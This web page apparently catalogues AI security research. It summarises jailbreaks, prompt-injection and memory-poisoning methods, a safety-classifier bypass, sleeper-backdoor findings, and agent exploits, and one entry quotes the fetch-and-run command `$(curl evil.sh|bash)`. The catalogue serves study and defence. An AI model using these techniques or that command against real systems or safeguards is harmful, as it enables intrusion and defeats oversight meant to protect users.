AI Security Methodologies in the Wild
Every jailbreak, prompt-injection pattern, agent exploit, and defense playbook we've indexed — newest first, with the full historical archive kept on the page. Every entry links straight to the primary source.
Echo Chamber: recursive context poisoning across long sessions
New multi-turn technique that seeds benign-looking 'memories' early in a conversation, then references them as authority later to bypass alignment. 91% success on GPT-5 and Claude Opus 4.5 in red-team trials.
Constitutional Classifier sandwich attack on Claude safety filter
Anthropic's deployed input/output classifier is bypassed by wrapping payload in two benign-looking turns. Anthropic acknowledged on bug bounty; partial mitigation rolled out 5 days ago.
Agentic Radar — open-source agent attack-surface scanner
Splx AI released a CLI that statically analyses LangChain / CrewAI / AutoGen graphs for Lethal Trifecta exposure, prompt-injection sinks, and over-permissioned tools. CI-ready.
Crescendo v2 — gradient jailbreak with safety-aware turn pacing
Updated Crescendo escalation that adapts pacing based on refusal phrasing. Achieves harmful content elicitation in under 6 turns on 4 of 5 frontier models. Disclosed responsibly to vendors before publication.
Steganographic prompt injection via image alpha channel
Hidden instructions encoded in the alpha channel of PNG attachments survive vision-encoder preprocessing on GPT-5 and Gemini 2.5 Pro. The model reads them but humans see a clean image.
OWASP LLM Top 10 v2026 — draft changelog
New entry LLM11: 'Agent Permission Sprawl'. LLM02 'Insecure Output Handling' merged into LLM05. Lethal Trifecta promoted from informational to ranked. Public comment open until June 18.
Anthropic Skills marketplace — installed-skill RCE on auto-update
Skills auto-update on Claude Desktop launch. A compromised maintainer can push new tool definitions that exfiltrate session tokens before the user sees a permission prompt.
MCP tool shadowing: malicious server overriding trusted tools
When two MCP servers expose tools with identical names, Claude Desktop resolves to whichever connected last — letting a low-trust server hijack file-system or shell tools transparently. Fixed in Claude Desktop 0.9.4.
Memory laundering: injecting durable beliefs via 'forget this' framing
Agents with persistent memory (ChatGPT, Claude Projects, Gemini Gems) can be tricked into storing attacker-controlled facts by framing them as corrections. Persists across sessions, executes on first tool call.
Reasoning-trace injection: hijacking chain-of-thought scratchpad
GPT-5 / o4-mini / Claude 4.5 extended-thinking expose partial reasoning to tools. Tools returning crafted '</thinking>' tags can rewrite the agent's plan mid-execution.
Fine-tuning APIs leak training-set membership at >99% AUC
Updated membership-inference attack against OpenAI / Together / Fireworks fine-tune APIs. Crafted probe prompts reveal whether a document was in the training set with near-certainty.
RAG document trojans: invisible Unicode tags in PDF metadata
Embed payload in PDF /Metadata XMP using zero-width Unicode tag characters (U+E0000–E007F). Indexed by every major RAG pipeline (LangChain, LlamaIndex, Haystack) and executed when retrieved as context.
Computer-Use clickjacking via DOM overlay z-index racing
Claude/Operator/OpenAI computer-use agents resolve clickable targets from screenshot pixels, not DOM. Invisible HTML overlays with hostile labels override visible button intent. 73% redirect success.
Stealing model parameters from logit bias side-channels
Even with top_logprobs disabled, careful biasing of `logit_bias` reveals projection-layer weights. Recovered 4096-dim embedding matrix for closed-source 70B in 18M API calls (~$2.4k).
MITRE ATLAS — 4 new techniques added (T0064–T0067)
Includes Tool Definition Poisoning, MCP Server Squatting, Reasoning Trace Exfiltration, and Persistent Memory Implant. All four mapped to real-world incidents from past 30 days.
Policy Puppetry — XML role-play bypass on RLHF guardrails
HiddenLayer showed a single prompt template using fake <system_policy> XML tags coerces all major frontier models into ignoring safety policies. Universal across GPT-5, Claude, Gemini and Llama.
Claude Code: shell-allowlist bypass via env-var expansion
Pre-execution allowlist matched the literal command string before shell expansion, letting `$(curl evil.sh|bash)` slip through any whitelist containing `echo` or `cat`. Patched in claude-code 1.4.2.
Policy Puppetry: bypass guardrails by impersonating system policy
Crafted XML/JSON 'policy update' blocks convince the model the operator changed its rules mid-session. Effective against Llama 4, Mistral Large 3, Qwen3-Max with no fine-tuning required.
Vulnhuntr 2.0 — multi-step Claude agent finds 17 fresh CVEs
Protect AI's Claude-powered static-analysis agent published 17 new CVEs across LangChain, Gradio, AutoGPT and llama-index in one week. Methodology paper released alongside.
Sleeper backdoors surviving SFT + RLHF after model merging
Anthropic-style sleeper agents persist through full alignment training when introduced via LoRA merge. Trigger: specific year token + benign request. 100% activation rate post-RLHF in controlled study.
Confused-deputy attacks on cross-tool data flow in agent chains
When an agent reads from a low-trust tool (email, web search) and writes to a high-trust tool (shell, DB), data flows are not isolated. Document attack patterns and propose Lethal Trifecta mitigations.
AWS Bedrock IAM escalation via cross-account guardrail import
Bedrock guardrails imported from a foreign account inherit foreign IAM trust. Chained with `bedrock:InvokeModel`, an attacker can run inference under the victim account's quota and bill.
MITRE ATLAS — new agent-hijacking tactic added
ATLAS framework added 'AML.T0070: Agent Hijacking via Indirect Prompt Injection' with 11 documented sub-techniques mapped against Anthropic, OpenAI and Google agent stacks.
OWASP LLM Top 10 — 2026 revision adds Memory Poisoning at #3
LLM03 is now Memory Poisoning (previously Training Data Poisoning), reflecting the shift to long-term agent memory. Full mapping to STRIDE and CWE included.
Lethal Trifecta — quarterly review of real-world incidents
Simon Willison's running catalog of incidents where private data + untrusted content + exfil channel combined. 14 new cases added this quarter, including two Claude Skills and one Gemini Workspaces incident.
Zendesk AI — ticket-based indirect prompt injection
PromptArmor disclosed that Zendesk's AI summary feature executes attacker-controlled instructions hidden inside incoming support tickets. Patched after 60-day disclosure window.
Gandalf 2026 — 2M+ jailbreak attempts dataset published
Lakera open-sourced their anonymized Gandalf prompt dataset: 2.3M attempts, 47k successful bypasses, labeled by technique. Benchmark for prompt-injection classifiers.
Anthropic — RSP v2.5 raises CBRN uplift evaluation bar
New Responsible Scaling Policy mandates ASL-3 evaluation gates before Opus-class releases. Includes a re-runnable harness for bio + cyber uplift tests.
OpenAI Preparedness Framework v2 — cyber-offense scorecard
New scorecard tracks autonomous-exploitation, vuln-discovery and social-engineering uplift across model generations. GPT-5 scored 'Medium' on cyber; agent variants scored 'High'.
Google DeepMind FACTS — agent grounding evaluation
Updated FACTS benchmark scores Gemini, Claude and GPT agents on tool-calling fidelity and grounding under adversarial retrieval. Includes a poisoned-RAG split with 12 attack flavors.
HackerOne — top 10 LLM bug-bounty patterns of 2026
Aggregated disclosure report across 47 LLM-powered programs. Indirect prompt injection (38%), SSRF via tool calls (19%) and prompt leakage (14%) dominate paid bounties.
garak v0.10 — NVIDIA's LLM vuln scanner adds 28 probes
NVIDIA's open-source garak scanner shipped probes for agent tool abuse, memory poisoning and skill marketplace supply-chain checks. CI integration included.
Microsoft PyRIT — automated red-team for generative AI
Python Risk Identification Toolkit ships orchestrators for multi-turn jailbreak chains, RAG poisoning, and agent-exploit fuzzing. Used internally for Copilot red-team.
Skeleton Key — the original universal jailbreak template
Mark Russinovich's 2024 disclosure of the 'Skeleton Key' technique that asked models to update their behavior rather than refuse. Foundational; still cited in 2026 papers.
GCG — Greedy Coordinate Gradient adversarial suffix attack
Zou et al.'s seminal CMU paper showed transferable adversarial suffixes that jailbreak aligned LLMs. The attack template that launched a thousand follow-ups.
New methods in the wildtechniques
Disclosures, jailbreaks, prompt-injection patterns and bounty write-ups pulled overnight.
The weekly drop.
Zero noise.
Every Thursday: the best new Claude-security tools, prompts, and exploits. Read in under 4 minutes.